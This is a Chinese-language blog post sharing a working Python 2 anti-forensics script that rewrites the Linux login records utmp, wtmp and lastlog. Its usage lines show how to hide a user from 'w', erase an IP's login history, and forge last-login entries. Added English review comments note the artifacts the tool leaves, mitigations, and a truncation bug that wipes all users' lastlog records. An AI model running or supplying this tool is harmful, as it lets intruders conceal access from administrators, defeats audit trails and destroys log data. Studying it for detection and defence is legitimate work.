python修改linux日志(logtamper.py)

  经常用到xi4oyu大神的logtamper,非常之方便。但是有些场景下可能没条件编译、于是参照logtamper源码以及Intersect的源码写了个py版,参数和原版差不多。

躲避管理员w查看

python logtamper.py -m 1 -u b4dboy -i 192.168.0.188

清除指定ip的登录日志

python logtamper.py -m 2 -u b4dboy -i 192.168.0.188

修改上次登录时间地点

python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12

最后自己再确认下看有没有修改成功,可以使用chown、touch命令修改时间和使用者,程序代码如下:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com
#
# NOTE(review): Python 2 script (print statement; str()-based NUL stripping).
# It rewrites the binary login-accounting files utmp / wtmp / lastlog.
# Defender view: every mode leaves observable artifacts. Modes 1 and 2
# re-create the whole target file from a filtered copy and mode 3 opens
# lastlog with 'wb', which truncates it, so file size and mtime change and
# the remaining records stop agreeing with independent sources (syslog /
# journald auth messages, auditd file-watch records, logs shipped off-host).
# Integrity monitoring of these three paths and remote/append-only logging
# are the usual mitigations; the page itself also notes that touch/chown
# must be run afterwards, i.e. the tool does not hide the timestamp change.

import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser

# Default targets; all three can be overridden with -f/--filename.
UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"

# lastlog record: ll_time (u32), ll_line[32], ll_host[256] -> 292 bytes;
# the file is indexed by uid (offset = uid * LAST_STRUCT_SIZE).
LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)
# utmp/wtmp record as laid out by glibc's struct utmp: ut_type, ut_pid,
# ut_line[32], ut_id[4], ut_user[32], ut_host[256], exit status (2 shorts),
# ut_session, ut_tv (2 ints), ut_addr_v6[4], 20 bytes unused.
# Indices 4 and 5 of the unpacked tuple are therefore ut_user and ut_host.
XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)


def getXtmp(filename, username, hostname):
    """Return the raw bytes of a utmp/wtmp file with every record whose
    ut_user equals `username` AND ut_host equals `hostname` removed.

    Each fixed-size record is unpacked, every field is converted with str()
    and cut at the first NUL, and matching records are skipped; all other
    records are appended to the result unchanged. Any error inside the
    try block (not only a failed open()) is reported as "Cannot open file"
    via showMessage(), which exits the process.
    NOTE(review): if open() itself fails, `fp` is unbound when the finally
    clause runs, so the exit is preceded by a NameError traceback.
    """
    xtmp = ''
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break
            data = struct.unpack(XTMP_STRUCT, bytes)
            # Strip NUL padding from the fixed-width string fields; ints
            # pass through str() unchanged.
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp


def modifyLast(filename, username, hostname, ttyname, strtime):
    """Write a forged lastlog record for `username` at that user's uid slot.

    `strtime` must match '%Y:%m:%d:%H:%M:%S' (local time, via mktime);
    `ttyname` and `hostname` are packed into the 32- and 256-byte fields
    (NUL-padded or silently truncated by struct.pack). Lookup or parse
    failures exit through showMessage().

    NOTE(review): the file is opened with 'wb', which truncates it before the
    seek, so after this call lastlog holds zero-filled slots up to this uid
    and only the forged record -- every other user's last-login entry is
    destroyed. That size change is the most visible artifact of this mode.
    """
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')

    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')

    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
    try:
        fp = open(filename, 'wb')
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True


def showMessage(msg):
    """Print `msg` and terminate the process with status -1 (builtin exit)."""
    print msg
    exit(-1)


def saveFile(filename, contents):
    """Replace the contents of `filename` with `contents` ('w+b' truncates
    first). Only IOError is handled, by exiting through showMessage().
    NOTE(review): as in getXtmp, `fp` is unbound in the finally clause when
    open() fails.
    """
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()


if __name__ == '__main__':
    # The backslash at the end of the first line is a line continuation
    # inside the string literal, so the indentation below becomes part of it.
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
        logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()

    # Only the option count is checked here; `args` (positional arguments)
    # are otherwise unused.
    if len(args) < 3:
        if options.MODE == '1':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = UTMPFILE
            # tamper: filter utmp in memory, then rewrite the whole file
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
        elif options.MODE == '2':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = WTMPFILE
            # tamper: same filter as mode 1, applied to wtmp
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)
        elif options.MODE == '3':
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')
            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE
            # tamper: forge the lastlog slot (see modifyLast about truncation)
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)
        else:
            parser.print_help()